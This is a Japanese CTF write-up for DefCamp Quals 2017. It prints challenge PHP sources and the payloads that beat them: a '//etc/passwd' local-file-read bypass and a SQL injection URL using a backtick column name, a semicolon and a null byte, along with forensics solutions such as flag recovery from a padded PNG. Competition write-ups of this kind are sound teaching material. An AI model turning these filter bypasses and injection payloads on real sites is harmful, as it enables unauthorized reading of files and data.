DefCamp CTF Qualification 2017 writeup

Is nano good?

nanoで編集するとbackupファイルとしてfile~が作られるらしい
https://junior2.dctf-quals-17.def.camp/index.php~

<?php
$page = $_GET["page"];
$type = $_GET["type"];
if (strpos($page, './../') !== false){
    header("Location: https://www.youtube.com/watch?v=dQw4w9WgXcQ");
    die();
}

if (strpos($page, '..././') !== false){
    header("Location: http://leekspin.com/");
    die();
}

if (strpos($page, '%') !== false){
    header("Location: http://www.nyan.cat/");
    die();
}

if (strpos($page, 'fille') !== false){
    header("Location: https://www.youtube.com/watch?v=o1eHKf-dMwo");
    die();
}

if (strpos($page, '/etc/passwd') === 0) {
    header("Location: https://www.youtube.com/watch?v=djV11Xbc914");
    die();
}
# I wonder if I can bypass path traversal restriction by going back and forward within the directorys....
if ($type == ""){
    echo file_get_contents($page.".php");
} else {
    #maybe we need something from the website 
    echo file_get_contents($page); 
}
?>

脆弱な部分

if (strpos($page, '/etc/passwd') === 0) {
    header("Location: https://www.youtube.com/watch?v=djV11Xbc914");
    die();
}

strposは第二引数の文字列が第一引数に存在した場合、最初のindexを返す。
indexを0の場合redirectされるようになっているが//etc/passwdとした場合indexが1になり
echo file_get_contents($page); が実行される

flagは/etc/passwdにある。

Are you brave enough?

競技中に解けなかった。プロが競技後に教えてくれたのでwriteupを残す(本当にありがとうございます)
index.php~がある。

<?php

$db  = mysqli_connect('localhost','web_brave','','web_brave');

$id  = @$_GET['id'];
$key = $db->real_escape_string(@$_GET['key']);

if(preg_match('/\s|[\(\)\'"\/\\=&\|1-9]|#|\/\*|into|file|case|group|order|having|limit|and|or|not|null|union|select|from|where|--/i', $id))
    die('Attack Detected. Try harder: '. $_SERVER['REMOTE_ADDR']); // attack detected

$query = "SELECT `id`,`name`,`key` FROM `users` WHERE `id` = $id AND `key` = '".$key."'";
$q = $db->query($query);

if($q->num_rows) {
    echo '<h3>Users:</h3><ul>';
    while($row = $q->fetch_array()) {
        echo '<li>'.$row['name'].'</li>';
    }

    echo '</ul>';
} else {    
    die('<h3>Nop.</h3>');
}

$idは''が無いので`id`とすることでidカラムを指定できる。
あとは;でクエリを閉じてコメントアウトの代わりに%00で終端させればflagが振ってくる

https://brave.dctf-quals-17.def.camp/index.php?id=`id`%3b%00

A-talkative-server

競技中に解けなかった。もうちょっとちゃんと取り組めば解けたかもしれないので反省。
https://a-talkative-server.dctf-quals-17.def.camp/image.php
にアクセスすると画像が表示されるんだけどずっとページの読み込みが終わらない。
手がかりが画像しかなさそうなので画像をダウンロードすると11GBくらいの巨大なpngファイルになっていた。
pngの後ろは途中まで¥x00で埋め尽くされているらしい。
¥x00バイトの文字以外を抽出してcatしてみると

DCTF{1542879e00fdfffg8794348ai like trains9ea1ab24e12abba1sbax4dea314a8787542aea10951db794}

が抽出できた。
しかし、flagフォーマットはDCTF{32_bytes_in_hex}らしいのでそれっぽく無い部分を削除する必要がある。
このままじゃよくわからないのでダウンロードしてきた元のpngをhexdumpすると

00004ce0  84 00 00 00 00 49 45 4e  44 ae 42 60 82 00 00 00  |.....IEND.B`....|
00004cf0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
a0004ce0  00 00 00 00 00 00 00 00  00 00 00 00 00 44 43 54  |.............DCT|
a0004cf0  46 7b 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |F{..............|
a0004d00  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
dac04cf0  00 00 31 35 34 32 00 00  00 00 00 00 00 00 00 00  |..1542..........|
dac04d00  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
df1f34f0  00 00 00 00 00 00 38 37  39 65 00 00 00 00 00 00  |......879e......|
df1f3500  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
fdbff8f0  00 00 00 00 00 00 00 00  00 00 30 30 66 64 00 00  |..........00fd..|
fdbff900  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
1021ff8f0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 66 66  |..............ff|
1021ff900  66 67 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |fg..............|
1021ff910  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
11d060d00  00 00 38 37 39 34 00 00  00 00 00 00 00 00 00 00  |..8794..........|
11d060d10  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
11dadf100  00 00 00 00 00 00 33 34  38 61 00 00 00 00 00 00  |......348a......|
11dadf110  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
11ea93100  00 00 00 00 00 00 00 00  00 00 69 20 6c 69 6b 65  |..........i like|
11ea93110  20 74 72 61 69 6e 73 00  00 00 00 00 00 00 00 00  | trains.........|
11ea93120  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
11fa47110  00 00 00 00 00 00 00 39  65 61 31 00 00 00 00 00  |.......9ea1.....|
11fa47120  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
12ae4b910  00 00 00 00 00 00 00 00  00 00 00 61 62 32 34 00  |...........ab24.|
12ae4b920  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
13ff13110  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 65  |...............e|
13ff13120  31 32 61 00 00 00 00 00  00 00 00 00 00 00 00 00  |12a.............|
13ff13130  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
142714120  00 00 00 62 62 61 31 00  00 00 00 00 00 00 00 00  |...bba1.........|
142714130  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
15d575520  00 00 00 00 00 00 00 73  62 61 78 00 00 00 00 00  |.......sbax.....|
15d575530  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
1783d6920  00 00 00 00 00 00 00 00  00 00 00 34 64 65 61 00  |...........4dea.|
1783d6930  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
17ae38920  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 33  |...............3|
17ae38930  31 34 61 00 00 00 00 00  00 00 00 00 00 00 00 00  |14a.............|
17ae38940  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
17cc3d130  00 00 00 38 37 38 37 00  00 00 00 00 00 00 00 00  |...8787.........|
17cc3d140  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
1a1a10d30  00 00 00 00 00 00 00 35  34 32 61 00 00 00 00 00  |.......542a.....|
1a1a10d40  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
1ae215d30  00 00 00 00 00 00 00 00  00 00 00 65 61 31 30 00  |...........ea10.|
1ae215d40  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
1dc615d30  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 39  |...............9|
1dc615d40  35 31 64 00 00 00 00 00  00 00 00 00 00 00 00 00  |51d.............|
1dc615d50  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
1e1615d40  00 00 00 62 37 39 34 00  00 00 00 00 00 00 00 00  |...b794.........|
1e1615d50  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
1f6a15d40  00 00 00 00 00 00 00 7d  00 00 00 00 00 00 00 00  |.......}........|
1f6a15d50  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*

と出るのでhexっぽくない部分がある連続した4文字を取り除くとflagが通った。

DCTF{1542879e00fd8794348a9ea1ab24e12abba14dea314a8787542aea10951db794}


A thousand words

テキストファイルが10個与えられる。
0001.txtと各ファイルのdiffを繋げればflagが振ってくる

Inception

foremostで抽出したファイルにflagが書かれている

HitandSplit

stringsするとDCTFという文字列が見えたのでどこかのパケットにflagがあるなと思い、
telnetを見ているとflagがある。